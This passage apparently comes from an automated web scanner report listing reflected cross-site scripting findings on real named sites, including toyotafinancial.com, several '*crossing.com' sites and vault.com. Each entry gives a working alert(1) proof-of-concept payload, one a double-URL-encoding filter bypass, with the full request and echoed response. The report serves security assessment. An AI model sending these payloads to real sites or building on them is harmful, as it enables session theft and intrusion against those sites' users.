Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615; s_cc=true; s_sq=undefinedtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:28:01 GMT
Content-length: 237
Content-type: text/html

<html>
<title>Get Primary Binary Error</title>
<body>
The following error occurred while trying to display property:
<p>
Node: /tfs/en_US/video/contentce625<script>alert(1)</script>47ad2d14cf9/data.xml does not exist.
<p>
...[SNIP]...

3.122. http://www.toyotafinancial.com/consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xml

Issue detail

The value of REST URL parameter 8 is copied into the HTML document as plain text between tags. The payload b1c4e%253cscript%253ealert%25281%2529%253c%252fscript%253ef7fa252dbe5 was submitted in the REST URL parameter 8. This input was echoed as b1c4e<script>alert(1)</script>f7fa252dbe5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 8 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /consumer/ShowBinary/BEA%20Repository/tfs/en_US/video/content/data.xmlb1c4e%253cscript%253ealert%25281%2529%253c%252fscript%253ef7fa252dbe5 HTTP/1.1
Host: www.toyotafinancial.com
Proxy-Connection: keep-alive
Referer: http://www.toyotafinancial.com/consumer/resources/video/tfs/viewer.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ofsc=6bvzN5JHhqXFWZdG3kh6Qnv0Bj8Zw8FCQ3vWn3j6pNn4mFsBLfLD!2083777476!658673615; s_cc=true; s_sq=undefinedtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:28:03 GMT
Content-length: 237
Content-type: text/html

<html>
<title>Get Primary Binary Error</title>
<body>
The following error occurred while trying to display property:
<p>
Node: /tfs/en_US/video/content/data.xmlb1c4e<script>alert(1)</script>f7fa252dbe5 does not exist.
<p>
...[SNIP]...

3.123. http://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/tfs.portal

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c74b"%3balert(1)//3b7137a4f55 was submitted in the _pageLabel parameter. This input was echoed as 6c74b";alert(1)//3b7137a4f55 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ForwardEstimator6c74b"%3balert(1)//3b7137a4f55 HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:17 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: ofsc=nGJrN5JZyqT9YnTWFjkvPwPqhThFY4Gb0TLnh2LvngkM1Jk6CQzB!2083777476!658673615; path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...
() {
//alert("openIntermediateMessageWindowTAM");

var requestURI = window.location.href;
var paramname='http://www.ToyotaThanksAMillion.com';
var from = "pg_ForwardEstimator6c74b";alert(1)//3b7137a4f55"

var URL = '/consumer/jsp/tfs/content/tfsTAMCampaignInterstitial.jsp?paramname='+paramname+'&from='+from;
var wid = screen.availWidth;
var hei = screen.availHeight;

if
...[SNIP]...

3.124. http://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toyotafinancial.com
Path:   /consumer/tfs.portal

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e1488'%3balert(1)//69259ebce5f was submitted in the _pageLabel parameter. This input was echoed as e1488';alert(1)//69259ebce5f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ForwardEstimatore1488'%3balert(1)//69259ebce5f HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:19 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Set-Cookie: ofsc=slvdN5JblW6q2TLn6GkBZpfndTvp6bvhGvGbjfsWnGQXhqtdFZQL!2083777476!658673615; path=/
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...
ion = 8;
// Minor version of Flash required
var requiredMinorVersion = 0;
// Minor version of Flash required
var requiredRevision = 0;

var pageLabel ='pg_ForwardEstimatore1488';alert(1)//69259ebce5f';

var hasReqestedVersion = false;
hasReqestedVersion = DetectFlashVer(requiredMajorVersion, requiredMinorVersion, requiredRevision);
//alert('hasReqestedVersion:'+hasReqestedVersi
...[SNIP]...

3.125. https://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.toyotafinancial.com
Path:   /consumer/tfs.portal

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 693dd"%3balert(1)//8bcb3a6d34b was submitted in the _pageLabel parameter. This input was echoed as 693dd";alert(1)//8bcb3a6d34b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ResourceCenterHome693dd"%3balert(1)//8bcb3a6d34b&_nfls=true&referrer=TYT HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; ofsc=FTJHN5JcXX4n9z4wyQc0l1bTdQq7f3Xm1tqdryTQ8yDpFTxTGZvx!658673615!1980963653; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]; s_sq=undefinedtoJSONString%2CtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString;

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:55:27 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...
{
//alert("openIntermediateMessageWindowTAM");

var requestURI = window.location.href;
var paramname='http://www.ToyotaThanksAMillion.com';
var from = "pg_ResourceCenterHome693dd";alert(1)//8bcb3a6d34b"

var URL = '/consumer/jsp/tfs/content/tfsTAMCampaignInterstitial.jsp?paramname='+paramname+'&from='+from;
var wid = screen.availWidth;
var hei = screen.availHeight;

if
...[SNIP]...

3.126. https://www.toyotafinancial.com/consumer/tfs.portal [_pageLabel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.toyotafinancial.com
Path:   /consumer/tfs.portal

Issue detail

The value of the _pageLabel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da0ab'%3balert(1)//9dd97cb4a8 was submitted in the _pageLabel parameter. This input was echoed as da0ab';alert(1)//9dd97cb4a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /consumer/tfs.portal?_nfpb=true&_pageLabel=pg_ResourceCenterHomeda0ab'%3balert(1)//9dd97cb4a8&_nfls=true&referrer=TYT HTTP/1.1
Host: www.toyotafinancial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; ofsc=FTJHN5JcXX4n9z4wyQc0l1bTdQq7f3Xm1tqdryTQ8yDpFTxTGZvx!658673615!1980963653; s_vi=[CS]v1|269CEA5D85013CD5-60000105801BCB1F[CE]; s_sq=undefinedtoJSONString%2CtoJSONString%3Dfunction%2520%2528%2529%2520%257B%250A%2520%2520%2520%2520%2520%2520%2520%2520return%2520s.object%2528this%2529%253B%250A%2520%2520%2520%2520%257D%26function%20%28%29%20%7B%0A%20%20%20%20%20%20%20%20return%20s.object%28this%29%3B%0A%20%20%20%20%7D%3DtoJSONString;

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:55:32 GMT
Content-type: text/html;charset=UTF-8
Content-Language: en
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>


   <head>


<title >Toyota Financial Services</title><meta name="bea
...[SNIP]...
n = 8;
// Minor version of Flash required
var requiredMinorVersion = 0;
// Minor version of Flash required
var requiredRevision = 0;

var pageLabel ='pg_ResourceCenterHomeda0ab';alert(1)//9dd97cb4a8';

var hasReqestedVersion = false;
hasReqestedVersion = DetectFlashVer(requiredMajorVersion, requiredMinorVersion, requiredRevision);
//alert('hasReqestedVersion:'+hasReqestedVersi
...[SNIP]...

3.127. http://www.tradingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f33a8"><script>alert(1)</script>dcf38b67f33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f33a8"><script>alert(1)</script>dcf38b67f33=1 HTTP/1.1
Host: www.tradingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9bdnnh8975tie73op81om9iv23; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 97304

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.tradingcrossing.com/?f33a8"><script>alert(1)</script>dcf38b67f33=1">
...[SNIP]...

3.128. http://www.trainingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trainingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77df3"><script>alert(1)</script>601a884eba3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?77df3"><script>alert(1)</script>601a884eba3=1 HTTP/1.1
Host: www.trainingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:49 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=nums7dcc1j6lqi6c182hojl957; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:49 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:49 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102528

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.trainingcrossing.com/?77df3"><script>alert(1)</script>601a884eba3=1">
...[SNIP]...

3.129. http://www.transportationcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.transportationcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7388e"><script>alert(1)</script>3273979c9e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?7388e"><script>alert(1)</script>3273979c9e3=1 HTTP/1.1
Host: www.transportationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:31 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=uu4j24vvnhit3de5jjak5ajl20; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:31 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:31 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 126907

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.transportationcrossing.com/?7388e"><script>alert(1)</script>3273979c9e3=1">
...[SNIP]...

3.130. http://www.travelingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29013"><script>alert(1)</script>55f735e164d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?29013"><script>alert(1)</script>55f735e164d=1 HTTP/1.1
Host: www.travelingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:28 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=98i3ogstggait0rcvm6cac2nu5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:28 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:28 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111563

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.travelingcrossing.com/?29013"><script>alert(1)</script>55f735e164d=1">
...[SNIP]...

3.131. http://www.truckingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.truckingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f69c"><script>alert(1)</script>940d23ae3a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?2f69c"><script>alert(1)</script>940d23ae3a1=1 HTTP/1.1
Host: www.truckingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=reqvomlshroa4lg39ro64hkq76; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109198

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.truckingcrossing.com/?2f69c"><script>alert(1)</script>940d23ae3a1=1">
...[SNIP]...

3.132. http://www.tvcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tvcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ee91a"><script>alert(1)</script>257bf57adca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ee91a"><script>alert(1)</script>257bf57adca=1 HTTP/1.1
Host: www.tvcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:12 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=seap0ed91uj33tvl8163cvrqq1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:12 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:12 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101362

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.tvcrossing.com/?ee91a"><script>alert(1)</script>257bf57adca=1">
...[SNIP]...

3.133. http://www.underwritingcrossing.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.underwritingcrossing.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10cd2"><script>alert(1)</script>eddf6cfe54a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?10cd2"><script>alert(1)</script>eddf6cfe54a=1 HTTP/1.1
Host: www.underwritingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:57 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ug7iikt1hilvoorm6cbc5913m2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:57 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:57 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103021

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<input type="hidden" name="clslogin_hdnloginurl" value="http://www.underwritingcrossing.com/?10cd2"><script>alert(1)</script>eddf6cfe54a=1">
...[SNIP]...

3.134. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f2df'%3balert(1)//8ecbb1f6508 was submitted in the REST URL parameter 4. This input was echoed as 9f2df';alert(1)//8ecbb1f6508 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wps/portal/usa/9f2df'%3balert(1)//8ecbb1f6508/company-profile/Vinson-&-Elkins-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 21 Jan 2011 18:46:35 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIBNjI30v_aj0nPwkkEon_XCQdmTlQY4uBp7OXuZBwf5exgYWBhB5AxzA0UDfzyM_N1W_IDvJIMvEUREAyuriAQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIBNjI30v_aj0nPwkkEon_XCQdmTlQY4uBp7OXuZBwf5exgYWBhB5AxzA0UDfzyM_N1W_IDvJIMvEUREAyuriAQ!!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
